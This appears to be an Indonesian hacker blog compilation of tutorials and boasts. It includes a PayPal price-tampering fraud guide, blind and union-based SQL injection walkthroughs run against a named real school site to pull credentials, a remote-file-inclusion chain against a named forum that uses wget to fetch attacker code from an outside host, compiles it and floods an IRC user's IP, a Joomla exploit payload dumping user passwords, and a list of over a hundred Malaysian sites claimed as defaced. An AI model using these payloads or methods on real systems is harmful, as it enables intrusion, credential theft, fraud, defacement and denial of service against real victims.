Cara ganti harga Paypal jadi $0.01

Jadi begini, kita bisa bayar beli barang dengan paypal tapi diganti harganya jadi $0.01...
Ini langkahnya:
1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …

Selamat Mencoba …
Semoga bermanfaat

Gw gak bertanggung jawab kalo ada kesalahan atau terjadi kejadian
---END---
Thx to: Kimmo (heckeria.net)

Blind SQL Injection

Akhirnya, setelah 2 hari mandul karena sibuk deface sana-sini, tapi gak ada hasil... :-(
Yaudah lah, karena saya lebih suka dapet tantangan "deface 5 web dalam 1 bulan! INGAT! jangan pake XSS!!!" daripada ngga, soalnya gak tau mo ngapain, selain blogging dan forumming, yep, secara tidak langsung, Indeves telah memberikan tantangan kepada saya minimal 2 web kedeface tanpa menggunakan XSS!

OK, back to topic aja deh...

Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: http://www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


http://www.smanti.com/berita.php?id=5 and 1=0 false

http://www.smanti.com/berita.php?id=5 and 1=1 true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) masih false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) masih false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) masih false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

http://www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


http://www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba wkwkwkw...

Thanks smua..duduw..wkwkw sekian...
---
Ditulis:Neo_Gabriel
Sumber: senot

Saya mendukung Indonesian Security Confrence

Aku mendukung Idsecconf 2009!

Yeah, saya memang sangat mendukungnya...
Saya liat di idsecconf.org banyak blog yang sejenis sama blog Darkness Hacker ini. Jadi saya ikut mendukung aja deh (tapi gak tau ikut kesana apa ngga... ^_^)
OK, kalo kalian mau dukung pergi ke 2009.idsecconf.org dan klik Dukung Kami, trus copas code banner yang dikehendaki, dan jangan lupa kirim email pemberitahuan ke idsecconf[at]echo[dot]or[dot]id


Udah deh gitu doank

NEW DEFACED GUESTBOOK!!!

YEAH! Akhirnya Cybernet Warrior beraksi untuk kesekian kalinya (cuma dua kali sih... ^_^)
Wokeh, Saya akan sedikit pamer...
Shoutz to: J4mbi H4ck3r
HACKED GUESTBOOK

Xixixixi...
Maaf yaa Malaysia...
---END---

Secret Code HP Nokia

Berikut ini adalah kunci kode tombol rahasia yang dapat anda jalankan sendiri dengan mengetiknya di keypad hp ponsel anda yang bermerek Nokia baik yang cdma maupun yang gsm.

1. Melihat IMEI (International Mobile Equipment Identity)
Caranya tekan * # 0 6 #

2. Melihat versi software, tanggal pembuatan softwre dan jenis kompresi software
Caranya tekan * # 0 0 0 0 #
Jika tidak berhasil coba pencet * # 9 9 9 9 #

3. Melihat status call waiting
Caranya tekan * # 4 3 #

4. Melihat nomor / nomer private number yang menghubungi ponsel anda
Caranya tekan * # 3 0 #

5. Menampilkan nomer pengalihan telepon all calls
Caranya tekan * # 2 1 #

6. Melihat nomor penelepon pada pengalihan telepon karena tidak anda jawab (call divert on)
Caranya tekan * # 6 1 #

7. Melihat nomor penelepon pada pengalihan telepon karena di luar jangkauan (call divert on)
Caranya tekan * # 6 2 #

8. Melihat nomor penelepon pada pengalihan telepon karena sibuk (call divert on)
Caranya tekan * # 6 7 #

9. Merubah logo operator pada nokia type 3310 dan 3330
Caranya tekan * # 6 7 7 0 5 6 4 6 #

10. Menampilkan status sim clock
Caranya tekan * # 7 4 6 0 2 5 6 2 5 #

11. Berpindah ke profil profile ponsel anda
Caranya tekan tombol power off tanpa ditahan

12. Merubah seting hp nokia ke default atau pabrikan
Caranya tekan * # 7 7 8 0 #

13. Melakukan reset timer ponsel dan skor game ponsel nokia
Caranya tekan * # 7 3 #

14. Melihat status call waiting
Caranya tekan * # 4 3 #

15. Melihat kode pabrik atau factory code
Caranya tekan * # 7 7 6 0 #

16. Menampilkan serial number atau nomer seri hp, tanggal pembuatan, tanggal pembelian, tanggal servis terakhir, transfer user data. Untuk keluar ponsel harus direset kembali.
Caranya tekan * # 92702689 #

17. Melihat kode pengamanan ponsel anda
Caranya tekan * # 2 6 4 0 #

18. Melihat alamat ip perangkat keras bluetooth anda
Caranya tekan * # 2 8 2 0 #

19. Mengaktifkan EFR dengan kualitas suara terbaik namun boros energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 3 3 7 0 #

20. Mengaktifkan EFR dengan kualitas suara terendah namun hemat energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 4 7 2 0 #

21. Menuju isi phone book dengan cepat di handphone nokia
Caranya tekan nomer urut lalu # contoh : 150#

22. Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan
Caranya tekan * * 2 1 * Nomor Tujuan #

23. Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab
Caranya tekan * * 6 1 * Nomor Tujuan #

24. Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika telepon hp anda sedang sibuk
Caranya tekan * * 6 7 * Nomor Tujuan #

Keterangan Tambahan :
- Kode diinput tanpa spasi
- Ada kode-kode nokia yang berlaku pada tipe tertentu saja
---END---
Sumber: yogiehacker.blogspot.com
Penulis: Yogie

Bug XSS on Indosiar.com

Tadi lagi nonton BBF (Boys Before Fired Flooded Flowers) (1 detik kemudian mau muntah rasanya...) Trus saya lagi di depan komputer, lagi SoNet-ing (Social Networking) dan Blogging, dan muncul suatu niat yang sedikit jahat yaitu buka situsnya di: www.indosiar.com dan cek bugs XSS-nya (maklum, masi newbie) dan JERENG!!!
Ternyata di search engine-nya ada bug XSS-nya lhooo!!!
Bagi admin Indosiar.com supaya ngepatch Bug XSS-nya yaa...
---END---

Facebook Hacking (Online di kompi tanpa terlihat online)

Kata kakak saya, kalo online aka OL di HP gak keliatan Online kalo di komputer...
Tapi, kalo OL di HP ngelag, gak cepet...
Nah, kalo kita online di Komputer tapi buka-nya HP, bisa kan???
Ok, saya kasih linknya: DISINI BOZZ

---END---

DDoS Reloaded

Ini adalah Tutorial DDoS dari J4mbi H4ck3r
Dork: inurl:/index.php?name=PNphpBB2
Tutorial:
1. Misalnya dapet korban: http://www.defendersofmodan.net/index.php?name=PNphpBB2

2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net

3. Masukkan bug ini di belakang situs tadi :

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

4. Masukkan file inject ini di belakang nya lagi :

http://www.geocities.com/jambihackerlinkcrew/sql.htm

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd

Jangan lupa memasukkan command Unix di ujungnya

5. Masukkan file tembak.c ini di belakang nya lagi :

http://www.freewebs.com/jambihackerlink/tembak.c

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c

6. Kemudian Compile file tembak.c

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c

7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois

misal nya

ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute

Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers

8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).

misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53

Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.
---END---
Penulis: J4mbi H4cker
Thanks to: J4mbi H4ck3r

Smiley JavaScript (100% Illegal)

Ini adalah Script Smiley yang saya ambil dari Shoutmix (Illegal kan?)
Nah, sekarang copas script ini ke Notepad lalu Upload ke Web Hosting anda...
var smileyList = [
[':)', 'www.shoutmix.com/smileys/smile.gif'],
[':(', 'www.shoutmix.com/smileys/sad.gif'],
[';)', 'www.shoutmix.com/smileys/wink.gif'],
[':D', 'www.shoutmix.com/smileys/grin.gif'],
[':P', 'www.shoutmix.com/smileys/tongue.gif'],
['B-)', 'www.shoutmix.com/smileys/cool.gif'],
[':">', 'www.shoutmix.com/smileys/blush.gif'],
[':((', 'www.shoutmix.com/smileys/cry.gif'],
['8-)', 'www.shoutmix.com/smileys/rolleyes.gif'],
['O_o', 'www.shoutmix.com/smileys/surprised.gif'],
['/:)', 'www.shoutmix.com/smileys/suspicious.gif'],
[':eek:', 'www.shoutmix.com/smileys/eek.gif'],
['>:)', 'www.shoutmix.com/smileys/twisted.gif'],
[':thumbsup:', 'www.shoutmix.com/smileys/thumbsup.gif'],
[':argh:', 'www.shoutmix.com/smileys/argh.gif'],
[':banghead:', 'www.shoutmix.com/smileys/banghead.gif'],
[':drool:', 'www.shoutmix.com/smileys/drool.gif'],
[':wise:', 'www.shoutmix.com/smileys/wise.gif'],
[':shrug:', 'www.shoutmix.com/smileys/shrug.gif'],
[':love:', 'www.shoutmix.com/smileys/love.gif'],
[':buttrock:', 'www.shoutmix.com/smileys/buttrock.gif'],
['^O^', 'www.shoutmix.com/smileys/notworthy.gif'],
];
Kalo anda mau bikin yang lain, tambahin aja kayak gini:
['(Teks yg ingin diganti emo)', '(url gambar emo)'],
Lalu, anda pasang JavaScript ini ke dalam Website yang ingin ditambahkan emoticons:
<script type="text/javascript" src="(URL JavaScript anda)"></script>

NAH! SEPERTI ITU RAHASIANYA!!!
---END---
Thanks to: Shoutmix

Robots.txt

Tau Googlebot? Googlebot adalah sebuah robot yang dibuat untuk mencari informasi baru dari suatu website supaya bisa mengindex di Google, tapi kita bisa kontrol Googlebot untuk tidak mengindex beberapa halaman dengan robots.txt. Nah, kita akan melihat robots.txt dari om google (Coba aja ketik di address bar: www.google.com/robots.txt), nah, sekarang udah telanjang tuh directorinya... Jadi kita bisa mendapatkan admin login lewat robots.txt
---END---
Penulis: cybermuttaqin dari Jasakom

Menembus blocked Website ato IP kita sendiri keblok...

OK, kalo anda di kantor biasanya facebook diblok atau anda pernah bermasalah dengan webmaster ato admin jadi IP kamu tidak bisa masuk ke situs, nah, saya akan mengajarkan 2 cara untuk menebus proteksinya, yaitu:
1. Pake proxy (Gampang... ikutin aja langkah-langkah setiap tools ato add-ons)
2. Langsung pergi ke server: (kalo IP kita yang diblok, gak bisa dipake...)
cara:
- Buka cmd
- ketik "ping (address)" tanpa tanda kutip, misal: ping www.facebook.com
- Lalu copas IP addressnya
- paste ke address bar
- rebes... eh salah, beres...

HOW IT CAN BE???
1. Yep, anda pasti tau cara kerja proxy, yang gak tau, coba liat gambar-gambar dibawah ini:

Gambar atas adalah apa yang terjadi jika tidak memakai proxy, yaitu terjadi interaksi secara langsung antara Client dengan Web server.
Lalu, jika Web server diblok, ato webserver memblok ip kita, lalu kitapun memakai proxy, jadinya seperti ini:

Web server tidak berinteraksi dengan Client, jika Web server memblok IP kita, tidak akan ketauan karena IP yang terpampang disitu adalah Proxy! Jika kita yang diblok, kita koneksi ke proxy server, dan tidak langsung menyentuh Web server, jadi bisa dijelasin kayak gini:
Aldi (Client) tidak diperbolehkan keluar rumah (apapun alasannya tidak boleh!), padahal dia ingin beli permen, jadi, dia meminta pembantunya (Proxy) untuk membelikannya permen, lalu si pembantu pergi ke warung (Web server) untuk beli permen, lalu pulang memberikan permen yang dibeli ke Aldi... jadi si penjaga warung gak tau kalo Aldi yang beli... (secara tidak langsung, Aldi sudah membeli permen)
Tentang Proxy sudah, yang terakhir, cmd, mengapa bisa terjadi?
Terjadi karena website yang diblok cuma Domain name-nya doank... bukan sekaligus dengan IP-nya (tapi gak tau juga deh, kalo bossnya juga Hacker trus ngesetnya sama-sama dengan IP-nya...) Tapi kalo IP kita yang diblok sama Web Server ya pastilah gak bisa, soalnya web server gak menerima koneksi langsung kepada IP kita walaupun ngaksesnya lewat IP...
Sekian Postingannya...
---END---

Ghostly Shoutmix

---1|\|7R0|)U(710|\|---
Tau Shout Mix? itu lhooo diatas itu!!! Shoutmix! itu adalah tempat untuk chat dengan pengunjung website... Tapi, kita bisa menjadi hantu.

---3FF3(7---
Kita bisa jadi hantu lagi ngechat di shoutmix, jadi gak keliatan di situs tersebut. (tapi kadang-kadang gak dianggep karena kadang-kadang orang gak ngeliat berapa banyak yg online... tapi efektif jika langsung banyak-banyak user yang jadi hantu ngejunk terus)

---7U70R14|_---
1. Menuju website yang sepi (menakuti orang minimal 2 org online termasuk anda, cara melihat berapa yg online adalah liat aja gambar seperti ini di situs tersebut:)
2. Lalu liat Source Codenya (Mozilla Serigala Api: klik View lalu View Source Code)
3. Search www.shoutmix.com, cari aja deket-deket situ ada www(nomor server).shoutmix.com/(nama shoutmix) lalu copas link tersebut ke address bar lalu Enter
4. JREENG!!! ada Sumber dari Shoutmix itu... Pake aja buat ngejunk (pake beberapa user)

---84641|\/|4|\|4 8154 73RJ4|)1?---
Karena Shoutmix pake Iframe dari suatu tempat yang disediakan untuk Shoutmix yang asli, jadi situs kita gak kebanyakan code... Tapi kita bisa menggunakannya untuk menjadi "hantu cyber" Hehehehehe...

END OF POSTING

Stupid Moderation (Operator Warnet)

Dulu, belom ada akses Internet, saya sering pergi ke warnet (maen Dota dan maen internet) dan kami melihat ada sebuah kelemahan pada suatu warnet yaitu:
- Password setiap komputer sama (kalo kita mau maen, ngomong ke op-nya trus dikasih password, tapi setiap kompi sama passwordnya)
- Password setiap paket sama (misal: paket 1 (1 jam) password aa, paket 2 (2 jam) password aa juga... begitu seterusnya...)
- Operatornya suka maen RF (Critical Vulnerablities!!!)

Prosedur Hacking:
1. Ajak kira-kira 3 orang jika warnet sepi (batas minimal kesensitifan operator jika warnet sepi) Ajak kira-kira 7 orang jika warnet sedikit banyak, atau 9 orang jika rame (jika tempatnya pas untuk 10 orang bisa...)
2. Bilanglah ke Operator: "Mas, mau maen mas, 1 jam" lalu kamu kasih duitnya (sekedar kasih tau, 1 jam 4 ribu) Operator kasih passwordnya... Sesudah itu, suruh org laen yg kamu ajak nyalakan komp dan terserah paket berapapun (karena semua password sama)
3. Maen sepuasnya... dijamin 88% gak dicurigain karena Vulnerablities ketiga membuat Operator asik maen RF plus keramaian membuat Operator gak tau siapa aja yg tadi maen...
4. Langsung pulang, karena tadi sudah bayar... ^_^

Untested, tapi saya jamin 89,48278762% berhasil!!!

---END---

Hack Pesawat Telepon yang Terkunci

Telepon....
Buatan Alexander Graham Bell...
Ini adalah benda yang hebat karena kita bisa berkomunikasi jarak jauh...
Tapi bagaimanakah cara Menelpon dalam keadaan telepon sedang terkunci???
Semua tombol angka terkunci! bagaimana anda akan menelpon?
Inilah caranya...
1. Angkat gagang Telepon...
2. Klik tombol dialnya... (GAK TAU? itu tuh, yang tombol yang biasa buat mutusin telepon yang ada pada dudukan telepon...) sebagai ganti nomor telepon, tapi bagaimana caranya??? tekan dialnya sebanyak angka pada nomor telepon. misalnya kamu mau telepon ke 021 8943238 jadi, kamu harus memencet dial sebanyak:
- 10x lalu diam sebentar (jangan lama-lama) menandakan memencet angka 0
- 2x lalu diam sebentar menandakan memencet angka 2
- 1x lalu diam sebentar menandakan memencet angka 1
- dan seterusnya...

Nah, kesimpulannya, semua system bisa dihack...
---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD

Selamat Hari Raya Idul Fitri

Kami segenap penulis Darkness Hacker (cuma satu)
Mengucapkan Selamat Hari Raya Idul Fitri
Mohon Maaf Lahir dan Batin bagi yang merayakannya
P.S. /me gak merayakan... cuma ngasih selamat aja...

Cara memakai Exploit dari Milw0rm (SQLi Only)

Di blognya YaDoY666, Saya melihat cerita YaDoY666 melawan orgil dari Malingsial yang menyerang Wordpress dengan Joomla Exploit Jadoel...
Dan saya juga melihat bahwa Maling juga nyerang dengan copas exploit milw0rm langsung (sama-sama dengan union+select+...... padahal itu cuma exploit buat beberapa situs yang nama columnnya sama, jumlah columnnya sama, dll.)
Nah, untuk Malingsial, saya buat postingan ini supaya kalian lebih creative dan lebih pinter (maunya disuap sama gue...)
Nih Caranya:
Misalnya kita dapet Exploit ini:
POC Exploit:
http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]
Nah, yg diatas itu, bisa dijadiin dork, tapi kalo mau dork yang lebih bagus, pake inurl:com_foobla_suggestion (diatas itu letak bugsnya)
Jangan copas exploit yang ini langsung ke web yang dituju: (Ini Exploitnya, kelanjutan dari atas kalo kita lanjutin SQLi)
/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos
_users
Yang diatas CUMA DEMO, kamu harusnya mulai dari: http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=
Misalnya kita dapet korban:
http://127.0.0.1/index.php?option=com_foobla_suggestions&controller=comment&idea_id=20
Lalu kita kan lagi SQLi, kita tambahin Single Quotes kan?
Begitulah Seterusnnya... (SQLi)
OK, selamat milw0rm-ing
JADI KALO MAU COPAS JANGAN EXPLOITNYA, TAPI LETAK BUGSNYA (tapi disesuaikan juga sih sama component-nya)
Misalnya kita sudah tau kalo situs www.aaa.com punya component foobla suggestion, nah, berarti kita masukin di address bar:http://www.aaa.com/index.php?option=com_foobla_suggestions&controller=comment&idea_id=1 dan lakukan SQLi...
---END---

The Hacker, Mencari Hacker Lewat Om Google, The Dead of Noordin M Top Series...

Semua luka itu masih terasa
Semua luka itu masih membekas Semua luka itu belum mengering
Semua luka itu belum hilang dari Dari hati kami, hati bangsa Indonesia

Beberapa waktu yang lalu kau hancurkan gedung-gedung dinegara kami
Beberapa waktu yang lalu kau hancurkan fasilitas yang kami bangun dengan keringat dan air mata
Beberapa waktu yang lalu kau sakiti saudara-saudara kami
Beberapa waktu yang lalu kau bunuh saudara-saudara kami

Kau telah menghancurkan semuanya Kau telah merusak bangsa kami dengan teror bom mu
Kau telah pengaruhi saudara kami untuk menyakiti saudaranya sendiri Kau telah merusak citra negara kami sebagai negara yang aman.

Kini engkau telah mati, Kini engkau telah kehilangan ragamu
Kini engkau telah menghadapnya ditangan bom yang kau rakit
Kini engkau harus pertanggung jawabkan semua kejahatan yang telah engkau lakukan

Hey Noordin, Kematianmu tidaklah cukup untuk mengobati luka-luka dihati ini
Hey Noordin, Kematianmu tidaklah cukup untuk membalaskan semua dendam kami

Semoga tidak ada lagi orang kejam seperti mu didunia ini
Jikapun ada kami segenap bangsa indonesia siap menghadapi orang-orang laknat sepertimu
Kami bangsa yang besar, kami tidak akan pernah takut atas semua teror mu itu.


Kesedihan ini memang masih bersisa... Walaupun Densus88 udah modarin tuh Noordin M Top...

Ini adalah beberapa Website yang di-deface dalam rangka "Kematian Noordin M Top":
[Dedicated to Indonesia]
1. http://suhz.net
2. http://lumina.com.my
3. http://www.alamtimur.com.my
4. http://www.anchorlink.com.my
5. http://www.ryjia.com.my
6. http://www.plischasia.com
7. http://www.konpro-group.com
8. http://www.pentateknik.com.my
9. http://www.crafsmy.com
10. http://www.ao.com.my
11. http://brimalstampress.com
12. http://www.ysegroup.com
13. http://easypack.com.my
14. http://www.rayaco.com.my
15. http://ccssb.com
16. http://www.impiantekad.com
17. http://www.houghton.com.my
18. http://chrla.net
19. http://jiahuahang.com
20. http://amaireauto.com
21. http://www.acmecom.com
22. http://ce-products.com
23. http://www.zainalcanopy.com
24. http://malaysian-express.com
25. http://www.tempcool.com.my
26. http://www.astroace.com.my
27. http://www.malimperformance.com
28. http://www.alamigroup.com
29. http://malimperformance.com
30. http://www.tomahawk-ind.com
31. http://arinexmy.com
32. http://www.cekaptera.com
33. http://berjayasewerage.com
34. http://www.ksridhammananda.com
35. http://www.ebiza.com.my
36. http://www.air-blowers.com.my
37. http://express-marble.com
38. http://chungmeng.com
39. http://www.immanex.com
40. http://www.aanetwork.info
41. http://www.slhc.com.my
42. http://www.jim.com.my
43. http://www.mes-online.com.my
44. http://www.dav.com.my
45. http://www.de-tag.com
46. http://acmecom.com
47. http://www.eceylinco.com
48. http://perfectmetal.com
49. http://www.ctflogistics.com
50. http://www.fluidsystems.com.my
51. http://www.astrauniforms.com
52. http://www.exxo.com.my
53. http://www.cellotron.com.my
54. http://www.ceylincoseylandevelopments.com
55. http://dtm.com.my
56. http://www.cannergy.com.my
57. http://www.intestmal.com
58. http://smartdor.com
59. http://www.frangipaniflora.com.my
60. http://eceydata.com
61. http://www.coolcare.biz
62. http://www.perfectmetal.com
63. http://ebathroom.com.my
64. http://www.kampat.com.my
65. http://royalcollegegroupof70.org
66. http://www.tyden.com.my
67. http://www.tobalidockyard.com
68. http://www.casa-impian.com
69. http://www.astrauniforms.com.my
70. http://www.cablestore.com.my
71. http://faacorp.com
72. http://brglobal.com
73. http://www.formahero.com.my
74. http://www.cissacom.com
75. http://www.easypack.com.my
76. http://signvec.com
77. http://www.cambridgetech.com.my
78. http://quantumatic-automation.com
79. http://www.eepro.com.my
80. http://www.slumberland.com.sg
81. http://fluidsystems-fssb.com
82. http://www.segarasia.com
83. http://www.greenyield.com.my
84. http://www.fitness.com.my
85. ctflogistics.com
86. http://www.people-station.com
87. http://www.eceyms.info
88. http://natural-country.com
89. http://www.cann.com.my
90. http://www.eepo.com.my
91. http://hulsmalaysia.com
92. http://www.brimalstampress.com
93. http://astrauniforms.com
94. http://intestmal.com
95. http://erlatech.com
96. http://www.senstech.com.my
97. http://www.allstartravel.com.my
98. http://flushngo.com
99. http://karmakarya.my
100.http://www.halal-world.com
101. http://www.ig.upm.edu.my/
102. http://foobeeveneer.com.my/
103. http://datiwellness.com.my/
104. http://www.sensepi.com/
105. http://yangshengong.com.my/
106. http://precioustime123.com/
107. http://lead2u.com.my/
108. http://www.malaysiaworms.com/
109. http://www.penternakanlintah.com/
110. http://www.wormbreeder.com/
111. http://www.eelmalaysia.com/
112. http://www.cacingmalaysia.com/
113. http://www.ternakancacing.com
114. http://www.malaysiabelut.com/
115. http://www.cacingmerah.com/
116. http://www.caci gjohor.com/
117. http://www.wormsbreeding.com
118. http://www.malaysiacacing.com
119. http://www.cacingkompos.com

Special Thanks to: Xshadow, inc0mp13te, Bi4kKob4r, PsyChotr0n, ju4ra, Jack-, Yadoy666, Gblack, IndoUnderground, Laharisi, t3cm4n, Cyber_Tomat, SasaIndahoz, MainHack brotherhood, ABC crew, SarkemHackerlink, Xcode, Jasakom, Kaskus, #IndonesiaUnite, Densus88, YOU!!

---END---
Sumber: yadoy666.serverisdown.org
Thanks to: Semua Defacer yang mendeface web diatas...

SQL Injection Full Version Revolution

Ini adalah Tutorial Lengkap (langsung copas) dari SQL Injection
===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver
5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
